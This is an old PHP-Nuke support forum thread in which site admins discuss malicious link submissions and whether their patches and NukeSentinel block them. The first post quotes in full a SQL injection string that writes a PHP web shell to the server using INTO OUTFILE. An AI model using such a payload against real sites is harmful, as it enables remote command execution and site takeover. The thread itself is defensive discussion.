| Author |
Message |
giantmidget
Regular
Joined: Nov 27, 2005
Posts: 58
|
 Posted:
Mon Dec 05, 2005 9:26 pm |
|
People keep making submissions for downloads with links like this:
Code:' UNION SELECT '<?echo 'Hi Master';print `$_GET[cmd]`;?>' INTO OUTFILE '../../www/phpnuke/shell.php'
|
Is this a threat ? I just delete the submissions. What exactly is the person attempting to do, and could it be possible for Sentinel to pickup this type of entry if it is a threat ? |
| |
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Mon Dec 05, 2005 9:44 pm |
|
Very, very, much a threat, albeit kiddie land. NukeSentinel(tm) should have no problem handling this. |
| |
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Mon Dec 05, 2005 11:51 pm |
|
Yep, its a SQL hack. The Patched files should be blocking this, if not, message me the entire URL they used to insert it |
_________________
- Only registered users can see links on this board! Get registered or login! -
Need help? Only registered users can see links on this board! Get registered or login! |
|
|
|
giantmidget
|
| Posted:
Tue Dec 06, 2005 6:39 pm |
|
They are not actually "inserting" anything. They are not uploading anything that I know of. They are submitting a "link" and that link contains that text. Of course, I never approve the submission, nor have I clicked them.
They add that exact text for the "Page URL" in /modules.php?name=Web_Links&l_op=AddLink like they were submitting a link to another website.
Oh, and I found this:
http://rgod.altervista.org/phpnuke78sql.html
I use 7.6 fully patched with sentinel. Sentinel does not show any new IP's blocked. |
| |
|
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
|
| Posted:
Tue Dec 06, 2005 7:46 pm |
|
Funny that this thread should come up, I have just had quite a few trying to insert url links into the news comments with
Code:www.mysite.com/modules.php?name=News&file=comments&subject=www usefull resources&comment=Nice info <A href=http
SNIPPED
&op=Ok!&pid=&sid=109&mode=0&order=0&thold=0&posttype=html
|
I havent seen this particular one before. |
| |
|
|
|
evaders99
|
| Posted:
Tue Dec 06, 2005 7:57 pm |
|
Yep, we know about this script already. It should be patched
Mm the second one looks like generic spammer. Probably not a hack |
| |
|
|
|
|
Guardian2003
|
| Posted:
Tue Dec 06, 2005 8:15 pm |
|
| Evaders99 wrote: | Yep, we know about this script already. It should be patched
Mm the second one looks like generic spammer. Probably not a hack |
Yes, obviously a kid as when his attempt failed, he signed up on my site in order to attempt posting links in news comments again but this time as a registered user.
As he wasnt sensible enough to use a free email account I have emailed his ISP. |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
